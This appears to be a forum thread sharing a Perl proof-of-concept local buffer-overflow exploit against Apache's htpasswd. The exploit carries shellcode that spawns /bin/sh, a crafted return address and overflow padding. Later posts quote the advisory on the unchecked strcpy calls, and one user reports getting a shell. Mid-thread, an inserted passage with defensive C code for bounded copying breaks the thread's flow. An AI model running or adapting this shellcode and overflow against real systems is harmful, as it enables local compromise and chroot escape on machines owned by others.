ShouiZen
CODE

#!/usr/bin/perl
# Proof Of Concept exploit for htpasswd of Apache.
# Read the advisory for more information.
# - Luiz Fernando Camargo
# - foxtrot_at_flowsecurity.org
$shellcode = "\x31\xdb\x6a\x17\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68".
"\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";


$target = "/usr/local/apache/bin/htpasswd";
$retaddr = 0xbffffffa - length($shellcode) - length($target);


print "using retaddr = 0x", sprintf('%lx',($retaddr)), "\r\n";


local($ENV{'XXX'}) = $shellcode;
$newret = pack('l', $retaddr);
$buffer = "A" x 272;
$buffer .= $newret x 4;
$buffer .= " ";
$buffer .= "B" x 290;


exec("$target -nb $buffer");

setthesun
This is a local exploit, right?
Gotisch
QUOTE

[01] Package Description
[02] The problem
[03] Possibilities
[04] Solution
[05] Proof of Concept
[06] Credits


[01] Short Description

Since htpasswd is part of apache software, here we got the apache description.
Apache has been the most popular web server on the Internet since
April of 1996. The October 2003 Netcraft Web Server Survey found that
more than 64% of the web sites on the Internet are using Apache, thus
making it more widely used than all other web servers combined.

[02] The problem

In apache/src/support/htpasswd.c were found lots of problems with strcpy.
Unchecked buffers with user and passwd variables may let an attacker
to take advantage of it.


[03] Possibilities

htpasswd is not setuid root by default. And it doesn't have any sense to
do it yourself. So you can't gain root by exploiting these bugs directly.

However, you can get out from apache's chroot environment since
htpasswd usually stays in its environment.

[04] Solution

Take a good look in strcpy functions and maybe change it for strncpy function.


[05] Proof of Concept

see first post



yep local
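As an added illustration, not taken from the advisory or from Apache's own htpasswd.c (whose exact source is not on this page): a hypothetical reconstruction of the bug class the advisory describes (a fixed-size buffer filled from a command-line argument with no length check) next to two bounded alternatives, including the strncpy() fix the Solution section suggests done so that the result is still NUL-terminated. MAX_STRING_LEN, the function names and the sample arguments are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Assumed destination size; the real value in htpasswd.c is not on the page. */
#define MAX_STRING_LEN 256

/* Pattern the advisory warns about (kept only as a comment, never called):
 *     char user[MAX_STRING_LEN];
 *     strcpy(user, argv[i]);      <- no bound, argv[i] may exceed the buffer
 */

/* Reject-on-overflow form: copy only if src plus its NUL fits in dst.
 * Returns 0 on success, -1 if the input is too long (nothing is written). */
int copy_arg_checked(char *dst, size_t dst_size, const char *src)
{
    size_t len = strlen(src);
    if (dst_size == 0 || len >= dst_size)
        return -1;
    memcpy(dst, src, len + 1);          /* includes the terminating NUL */
    return 0;
}

/* Truncating form: strncpy() alone leaves dst unterminated when src is
 * at least dst_size bytes, so the terminator is written explicitly. */
void copy_arg_truncating(char *dst, size_t dst_size, const char *src)
{
    strncpy(dst, src, dst_size - 1);
    dst[dst_size - 1] = '\0';
}

/* Stand-in for the "-nb user password" path: both arguments land in fixed
 * buffers and an oversized one fails cleanly instead of overflowing.
 * The real tool hashes the password; here it is written unchanged. */
int build_entry(const char *user, const char *pw, char *out, size_t out_size)
{
    char ubuf[MAX_STRING_LEN], pbuf[MAX_STRING_LEN];
    if (copy_arg_checked(ubuf, sizeof ubuf, user) != 0 ||
        copy_arg_checked(pbuf, sizeof pbuf, pw) != 0)
        return -1;
    if (snprintf(out, out_size, "%s:%s", ubuf, pbuf) >= (int)out_size)
        return -1;
    return 0;
}

/* Constructed input: user of user_len 'A's and password of pw_len 'B's. */
int try_entry(size_t user_len, size_t pw_len)
{
    char user[512], pw[512], out[1024];
    if (user_len >= sizeof user || pw_len >= sizeof pw)
        return -1;
    memset(user, 'A', user_len); user[user_len] = '\0';
    memset(pw, 'B', pw_len);     pw[pw_len] = '\0';
    return build_entry(user, pw, out, sizeof out);
}
```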
gsicht
I got a shell, but no root privileges
Gotisch
QUOTE
htpasswd is not setuid root by default. And it doesn't have any sense to
do it yourself. So you can't gain root by exploiting these bugs directly.

However, you can get out from apache's chroot environment since
htpasswd usually stays in its environment.